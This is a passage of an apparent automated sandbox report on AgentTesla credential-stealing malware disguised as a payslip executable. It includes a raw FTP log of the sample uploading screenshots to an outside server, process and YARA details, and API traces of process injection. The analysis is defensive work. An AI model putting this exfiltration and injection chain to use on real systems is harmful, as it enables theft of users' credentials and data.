                                                                                                          Nov 4, 2024 21:28:37.753177881 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:38.102790117 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,220,53)
                                                                                                          Nov 4, 2024 21:28:38.108731985 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2025_02_10_03_11_38.jpeg
                                                                                                          Nov 4, 2024 21:28:39.042651892 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:39.863949060 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.815 seconds (measured here), 90.63 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:46.652870893 CET5004021192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:47.001415968 CET2150040110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,196,195)
                                                                                                          Nov 4, 2024 21:28:47.007858992 CET5004021192.168.2.4110.4.45.197STOR SC_user-724536_2025_01_27_06_09_57.jpeg
                                                                                                          Nov 4, 2024 21:28:47.921161890 CET2150040110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:48.665375948 CET2150040110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.744 seconds (measured here), 99.27 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:50.512969017 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:50.862457037 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,233,168)
                                                                                                          Nov 4, 2024 21:28:50.869215965 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2025_02_17_03_34_59.jpeg
                                                                                                          Nov 4, 2024 21:28:51.800158978 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:52.232244968 CET5004021192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:52.571675062 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.772 seconds (measured here), 95.71 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:52.577948093 CET2150040110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,235,203)
                                                                                                          Nov 4, 2024 21:28:52.588850021 CET5004021192.168.2.4110.4.45.197STOR SC_user-724536_2025_01_31_17_17_46.jpeg
                                                                                                          Nov 4, 2024 21:28:53.481708050 CET2150040110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:54.331672907 CET2150040110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.751 seconds (measured here), 98.36 Kbytes per second
                                                                                                          Nov 4, 2024 21:29:03.609679937 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:29:03.959089041 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,235,230)
                                                                                                          Nov 4, 2024 21:29:03.964960098 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2024_11_04_15_29_02.jpeg
                                                                                                          Nov 4, 2024 21:29:04.867230892 CET2149735110.4.45.197192.168.2.4150 Accepted data connection

                                                                                                          Target ID:0
                                                                                                          Start time:15:24:51
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Payslip_October_2024.exe"
                                                                                                          Imagebase:0xa30000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:15:24:54
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Payslip_October_2024.exe"
                                                                                                          Imagebase:0x5a0000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4125026006.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4125026006.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4125026006.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:3
                                                                                                          Start time:15:25:06
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                          Imagebase:0x470000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 32%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:15:25:07
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                          Imagebase:0x1b0000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:15:25:07
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                          Imagebase:0x7b0000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1889661399.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:7
                                                                                                          Start time:15:25:14
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                          Imagebase:0x570000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:15:25:15
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                          Imagebase:0x7b0000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4124052676.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4124052676.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4124052676.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.1%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:4.3%
                                                                                                            Total number of Nodes:256
                                                                                                            Total number of Limit Nodes:15

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                            • API String ID: 0-1677660839
                                                                                                            • Opcode ID: 3e2a74346ea4c7172f59bbc570a6132e284a53b9f3ab389dd27215cd2a36b561
                                                                                                            • Instruction ID: d6c5e7939701c79e067ad2b95012b27cedf7b3c7e4af6734707c2c9d0b14fc47
                                                                                                            • Opcode Fuzzy Hash: 3e2a74346ea4c7172f59bbc570a6132e284a53b9f3ab389dd27215cd2a36b561
                                                                                                            • Instruction Fuzzy Hash: 30327F74E002189FDB54DFA8C8507AEBBF2BF98300F14816AD449AB395EB349D46CF95

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0130E35E
                                                                                                            • GetCurrentThread.KERNEL32 ref: 0130E39B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0130E3D8
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0130E431
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: bc77d9f588c507c72b574a5de8d02bd253e38451848ba54c3583d16f511ce12b
                                                                                                            • Instruction ID: 77b4b3645a40d3c05d4fbac44c26f45a11fc271e4fd9ea518d99c7df15e42ade
                                                                                                            • Opcode Fuzzy Hash: bc77d9f588c507c72b574a5de8d02bd253e38451848ba54c3583d16f511ce12b
                                                                                                            • Instruction Fuzzy Hash: 935126B0E013498FDB18DFA9D548B9EBFF1AF48314F208559E419A73A0D7346944CB65

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0E5836FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: be340b42789e15093fcd00a11082b78d32082cf21ce81a5945b389402aa5396f
                                                                                                            • Instruction ID: bc55e49bf3d9e0c7f3ee43742f5fb74b6de95da54a6fe6b10ab0f17f48767b89
                                                                                                            • Opcode Fuzzy Hash: be340b42789e15093fcd00a11082b78d32082cf21ce81a5945b389402aa5396f
                                                                                                            • Instruction Fuzzy Hash: A4A15BB1D002198FEB24DF68C9417EDBBF2BF48714F1489AAD858B7280DB749985CF91

                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0E5836FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: a09b79ddedbccf348000223cbd6777bdc863486af7cea459855251d257ad903a
                                                                                                            • Instruction ID: ea80874b5027b44ba95453da380c1a5ce22b9fd1a8f0daa7c797e5cde9e61e39
                                                                                                            • Opcode Fuzzy Hash: a09b79ddedbccf348000223cbd6777bdc863486af7cea459855251d257ad903a
                                                                                                            • Instruction Fuzzy Hash: FF916DB1D002198FEB10DF69C9407EDBBF2BF48714F14896AD859B7280DB749985CF91

                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0130C29E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 1ee6ea0450f1c9e19cc751901abd385957011cda705fb1db049dc943f4054502
                                                                                                            • Instruction ID: 1d41026849fcadb77861ab0082c109a45354d4b839c37eeda0b5ad0093a6d831
                                                                                                            • Opcode Fuzzy Hash: 1ee6ea0450f1c9e19cc751901abd385957011cda705fb1db049dc943f4054502
                                                                                                            • Instruction Fuzzy Hash: F4815870A00B058FD726DF29D45475ABBF1FF88304F108A6DD48AD7A90D735E945CB90

                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 013059C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: d53643fc481729f14e21d70c90b70b4d9d8b7aa2104bf0aba8c978d83fec0492
                                                                                                            • Instruction ID: 94b6e71e6bbe026c56b65d036aa407eabd1191c6c5c5bfebe33bcc40cbef747f
                                                                                                            • Opcode Fuzzy Hash: d53643fc481729f14e21d70c90b70b4d9d8b7aa2104bf0aba8c978d83fec0492
                                                                                                            • Instruction Fuzzy Hash: 4241E2B0C00759CEDB25DFA9C884BDDBBF5BF49308F20806AD409AB291DB75694ACF50

                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 013059C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 91ab004ad7b173a926e9d8a5eab8bee0b358ca730928982b73a684776102aae7
                                                                                                            • Instruction ID: 2e076a326f1355495055a09a9a250f9b83cc4d32addee8a05adefc58093de6ef
                                                                                                            • Opcode Fuzzy Hash: 91ab004ad7b173a926e9d8a5eab8bee0b358ca730928982b73a684776102aae7
                                                                                                            • Instruction Fuzzy Hash: AD41D2B0C0075DCBDB25DFA9C844B9EBBF5BF49318F20806AD409AB291DB756949CF90
                                                                                                            APIs
                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 074A0C97
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFromIconResource
                                                                                                            • String ID:
                                                                                                            • API String ID: 3668623891-0
                                                                                                            • Opcode ID: 6a899a50c8331e51a48668af759f44e7dacc746886931487d288f6f5aacaa056
                                                                                                            • Instruction ID: 97da22d516a341be56efe3228b4cd878062123e50cdec2fa0b30d06795c39bb7
                                                                                                            • Opcode Fuzzy Hash: 6a899a50c8331e51a48668af759f44e7dacc746886931487d288f6f5aacaa056
                                                                                                            • Instruction Fuzzy Hash: E731BCB1900349AFCB11DFA9C844ADFBFF8EF09310F14845AE954A7261C3359954DFA1
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0E5832D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 0616132146c02aef30132b6ce670dcf1acac3637f672449ce929c6a90e324c60
                                                                                                            • Instruction ID: adc9ed5aa5e596d8df3b059fcd74c01ce4a274d860ecb8efaba8622205dbec0d
                                                                                                            • Opcode Fuzzy Hash: 0616132146c02aef30132b6ce670dcf1acac3637f672449ce929c6a90e324c60
                                                                                                            • Instruction Fuzzy Hash: 9D217AB1D003498FDB14DFA9C885BEEBBF1FF48310F10842AE919A7241C7789954CBA0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: dc92538959eb5ebfad208d4163f124026cbf42370998eff379462eab6a870193
                                                                                                            • Instruction ID: bab1b96df978c50da5b8df8aa84aa3ba5a275f2962bc1786bac0d548cce973f8
                                                                                                            • Opcode Fuzzy Hash: dc92538959eb5ebfad208d4163f124026cbf42370998eff379462eab6a870193
                                                                                                            • Instruction Fuzzy Hash: E6218BB09042488FCB10EFA9C4457DEFFF5EF89310F20846DD519A7290CA389941CB91
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0E5832D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 3284240f9da5c0021bfe452d085211f43e8524044426136689f3583b2ea2dd80
                                                                                                            • Instruction ID: a5d8038cdad9a2426cd61c4f1765577bf84ad7ccf07429a870158aceb666c692
                                                                                                            • Opcode Fuzzy Hash: 3284240f9da5c0021bfe452d085211f43e8524044426136689f3583b2ea2dd80
                                                                                                            • Instruction Fuzzy Hash: CE213BB19003499FCB14DFA9C985BEEBBF5FF48310F108429E959A7241C7789954CBA4
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0E5833B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: aa3d262cf9837b48910dd2b4d0bf3ad09a0282a962b60597fcb44391e40e1025
                                                                                                            • Instruction ID: 45b50de73bbe9430de9b694e00a89d200023f0b5d929dc1ef83f0efc5b4168d8
                                                                                                            • Opcode Fuzzy Hash: aa3d262cf9837b48910dd2b4d0bf3ad09a0282a962b60597fcb44391e40e1025
                                                                                                            • Instruction Fuzzy Hash: FA2127B1D002599FCB14DFA9C885AEEBBF1FF48310F50842EE518A7241CB389945DBA5
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0E583126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: cc2c5b954aaea985841e09b6c248bccedca020220ac3f11c184c14f0deff9e60
                                                                                                            • Instruction ID: b41d82ce97f63a803c926c4cd819ae32138f5ad3ac569618003859bb0f1470cc
                                                                                                            • Opcode Fuzzy Hash: cc2c5b954aaea985841e09b6c248bccedca020220ac3f11c184c14f0deff9e60
                                                                                                            • Instruction Fuzzy Hash: 932137B1D003498FDB14DFAAC5857EEBFF1AF88324F14842ED459A7241CB789945CBA1
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0E5833B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0E583126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0130E9B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0E5831EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0E5831EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0130C29E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0E58574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0E58574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0E58574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a21abba1aebcabc7653e7e3562359e51e7d098474a7a717bfa019e0265a5d500
                                                                                                            • Instruction ID: 36b7d41bf7dec7cd079aff5b3c8344a332ab4a4d1e3b433c0140e912118ee11b
                                                                                                            • Opcode Fuzzy Hash: a21abba1aebcabc7653e7e3562359e51e7d098474a7a717bfa019e0265a5d500
                                                                                                            • Instruction Fuzzy Hash: 5EE11CB4E002199FCB15DFA9C5809AEFBF6FF89305F24916AD414AB355D730A981CFA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
